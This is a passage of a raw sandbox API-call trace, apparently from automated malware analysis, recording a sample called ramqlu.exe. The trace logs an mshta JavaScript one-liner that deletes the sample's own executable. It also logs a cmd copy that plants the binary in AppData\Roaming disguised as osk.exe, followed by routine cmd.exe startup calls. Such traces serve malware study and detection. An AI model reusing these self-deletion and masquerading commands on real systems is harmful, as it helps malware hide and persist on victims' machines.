lpUsedDefaultChar=0x0) returned 28 [0059.442] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed38, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", 
lpUsedDefaultChar=0x0) returned 1 [0059.442] SysReAllocStringLen (in: pbstr=0x18fdb4*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", len=0x97 | out: pbstr=0x18fdb4*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 1 [0059.443] SysReAllocStringLen (in: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('@');close()}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", len=0x97 | out: pbstr=0x18fe14*="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"") returned 1 [0059.443] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpStartupInfo=0x18fdd0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fdc0 | out: lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);\"", lpProcessInformation=0x18fdc0*(hProcess=0x174, hThread=0x12c, dwProcessId=0x358, 
dwThreadId=0x90)) returned 1 [0059.515] ExitProcess (uExitCode=0x0) Thread: id = 7 os_tid = 0x7ac Thread: id = 9 os_tid = 0x408 Thread: id = 10 os_tid = 0x738 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x47261000" os_pid = "0x7d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x40c [0058.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffdbc | out: lpSystemTimeAsFileTime=0x3ffdbc*(dwLowDateTime=0xed7beaa0, dwHighDateTime=0x1d61645)) [0058.230] GetCurrentProcessId () returned 0x7d4 [0058.230] GetCurrentThreadId () returned 0x40c [0058.230] GetTickCount () returned 0x11475dc [0058.230] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffdb4 | out: lpPerformanceCount=0x3ffdb4*=17858459112) returned 1 [0058.232] GetModuleHandleA (lpModuleName=0x0) returned 0x4a730000 [0058.232] __set_app_type (_Type=0x1) [0058.232] __p__fmode () returned 0x770331f4 [0058.232] __p__commode () returned 0x770331fc [0058.232] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a7521a6) returned 0x0 [0058.232] __getmainargs (in: _Argc=0x4a754238, _Argv=0x4a754240, _Env=0x4a75423c, _DoWildCard=0, _StartInfo=0x4a754140 | out: _Argc=0x4a754238, _Argv=0x4a754240, 
_Env=0x4a75423c) returned 0 [0058.233] GetCurrentThreadId () returned 0x40c [0058.233] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x40c) returned 0x60 [0058.233] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.233] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0058.233] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.233] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0058.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffd4c | out: phkResult=0x3ffd4c*=0x0) returned 0x2 [0058.234] VirtualQuery (in: lpAddress=0x3ffd83, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0058.234] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffd1c, dwLength=0x1c | out: lpBuffer=0x3ffd1c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) 
returned 0x1c [0058.234] GetConsoleOutputCP () returned 0x1b5 [0058.234] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.234] SetConsoleCtrlHandler (HandlerRoutine=0x4a74e72a, Add=1) returned 1 [0058.234] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.234] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0058.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7541ac | out: lpMode=0x4a7541ac) returned 1 [0058.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.235] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.235] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.235] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7541b0 | out: lpMode=0x4a7541b0) returned 1 [0058.236] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.236] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0058.236] GetEnvironmentStringsW () returned 0x4b2168* [0058.236] GetProcessHeap () returned 0x4a0000 [0058.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xaca) returned 0x4b2c40 [0058.236] FreeEnvironmentStringsW (penv=0x4b2168) returned 1 [0058.236] GetProcessHeap () returned 0x4a0000 [0058.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x4) returned 0x4b1850 [0058.236] GetEnvironmentStringsW () returned 0x4b2168* [0058.236] GetProcessHeap () returned 0x4a0000 [0058.237] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xaca) returned 0x4b3718 [0058.237] FreeEnvironmentStringsW (penv=0x4b2168) returned 1 [0058.237] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecbc | out: phkResult=0x3fecbc*=0x68) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x0, 
lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x0, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.237] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.237] RegCloseKey (hKey=0x68) returned 0x0 [0058.237] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fecbc | out: phkResult=0x3fecbc*=0x68) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x40, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegQueryValueExW (in: 
hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x1, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x0, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x4, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x4) returned 0x0 [0058.238] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fecc4, lpData=0x3fecc8, lpcbData=0x3fecc0*=0x1000 | out: lpType=0x3fecc4*=0x0, lpData=0x3fecc8*=0x9, lpcbData=0x3fecc0*=0x1000) returned 0x2 [0058.238] RegCloseKey (hKey=0x68) returned 0x0 [0058.238] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c0 [0058.238] srand (_Seed=0x5e9c43c0) [0058.238] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0058.238] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /c copy /y \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\"" [0058.238] GetCurrentDirectoryW 
(in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.239] GetProcessHeap () returned 0x4a0000 [0058.239] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x210) returned 0x4b2168 [0058.239] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b2170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0058.239] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0058.239] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0058.239] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0058.239] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0058.239] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0058.239] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0058.239] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0058.239] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0058.239] GetProcessHeap () returned 0x4a0000 [0058.239] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b2c40 | out: hHeap=0x4a0000) returned 1 [0058.240] GetEnvironmentStringsW () returned 0x4b2380* [0058.240] GetProcessHeap () returned 0x4a0000 [0058.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xae2) returned 0x4b4ce0 [0058.240] 
FreeEnvironmentStringsW (penv=0x4b2380) returned 1 [0058.240] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.240] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a760640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0058.240] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0058.240] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0058.240] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0058.240] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0058.241] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0058.241] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0058.241] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0058.241] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0058.241] GetProcessHeap () returned 0x4a0000 [0058.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x30) returned 0x4b1fe8 [0058.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ffa88 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x3ffa88, lpFilePart=0x3ffa84 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3ffa84*="system32") returned 0x13 [0058.241] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0058.241] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x3ff804 | out: lpFindFileData=0x3ff804*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", 
cAlternateFileName="")) returned 0x4b57d0 [0058.241] FindClose (in: hFindFile=0x4b57d0 | out: hFindFile=0x4b57d0) returned 1 [0058.241] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x3ff804 | out: lpFindFileData=0x3ff804*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4a0ff0 [0058.242] FindClose (in: hFindFile=0x4a0ff0 | out: hFindFile=0x4a0ff0) returned 1 [0058.242] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0058.242] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0058.242] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4ce0 | out: hHeap=0x4a0000) returned 1 [0058.242] GetEnvironmentStringsW () returned 0x4b41f0* [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xb12) returned 0x4b4d10 [0058.242] FreeEnvironmentStringsW (penv=0x4b41f0) returned 1 [0058.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b1fe8 | out: hHeap=0x4a0000) returned 1 [0058.242] GetProcessHeap () returned 0x4a0000 [0058.242] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400e) returned 0x4b5830 [0058.243] GetProcessHeap () returned 0x4a0000 [0058.243] RtlAllocateHeap (HeapHandle=0x4a0000, 
Flags=0x8, Size=0xf2) returned 0x4a0ff0 [0058.243] GetProcessHeap () returned 0x4a0000 [0058.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5830 | out: hHeap=0x4a0000) returned 1 [0058.243] GetConsoleOutputCP () returned 0x1b5 [0058.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.243] GetUserDefaultLCID () returned 0x409 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a754950, cchData=8 | out: lpLCData=":") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="0") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="0") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ffbc8, cchData=128 | out: lpLCData="1") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a754940, cchData=8 | out: lpLCData="/") returned 2 [0058.244] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a754d80, cchData=32 | out: lpLCData="Mon") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a754d40, cchData=32 | out: lpLCData="Tue") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a754d00, cchData=32 | out: lpLCData="Wed") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a754cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a754c80, cchData=32 | out: lpLCData="Fri") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a754c40, cchData=32 | out: lpLCData="Sat") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a754c00, cchData=32 | out: lpLCData="Sun") returned 4 [0058.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a754930, cchData=8 | out: lpLCData=".") returned 2 [0058.245] 
GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a754920, cchData=8 | out: lpLCData=",") returned 2 [0058.245] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0058.247] GetProcessHeap () returned 0x4a0000 [0058.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20c) returned 0x4b2ea0 [0058.247] GetConsoleTitleW (in: lpConsoleTitle=0x4b2ea0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.247] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0058.247] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0058.248] GetProcessHeap () returned 0x4a0000 [0058.248] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x400a) returned 0x4b5830 [0058.248] GetProcessHeap () returned 0x4a0000 [0058.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5830 | out: hHeap=0x4a0000) returned 1 [0058.248] _wcsicmp (_String1="copy", _String2=")") returned 58 [0058.248] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0058.248] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0058.248] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0058.248] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0058.248] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0058.248] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0058.249] GetProcessHeap () returned 0x4a0000 [0058.249] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x58) returned 0x4a10f0 [0058.249] GetProcessHeap () returned 0x4a0000 [0058.249] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a1150 [0058.252] GetProcessHeap () returned 0x4a0000 [0058.252] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xe6) returned 
0x4a1170 [0058.253] GetConsoleTitleW (in: lpConsoleTitle=0x3ff8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0058.253] _wcsicmp (_String1="copy", _String2="DIR") returned -1 [0058.253] _wcsicmp (_String1="copy", _String2="ERASE") returned -2 [0058.253] _wcsicmp (_String1="copy", _String2="DEL") returned -1 [0058.253] _wcsicmp (_String1="copy", _String2="TYPE") returned -17 [0058.253] _wcsicmp (_String1="copy", _String2="COPY") returned 0 [0058.253] GetProcessHeap () returned 0x4a0000 [0058.253] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c4) returned 0x4b30b8 [0058.254] GetProcessHeap () returned 0x4a0000 [0058.254] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b30b8, Size=0xe8) returned 0x4b30b8 [0058.254] GetProcessHeap () returned 0x4a0000 [0058.254] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b30b8) returned 0xe8 [0058.255] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0058.255] GetProcessHeap () returned 0x4a0000 [0058.255] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xf0) returned 0x4b31a8 [0058.256] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a755260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a1260 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b32a0 [0058.256] GetProcessHeap () returned 0x4a0000 [0058.256] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4a1298 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 
[0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", 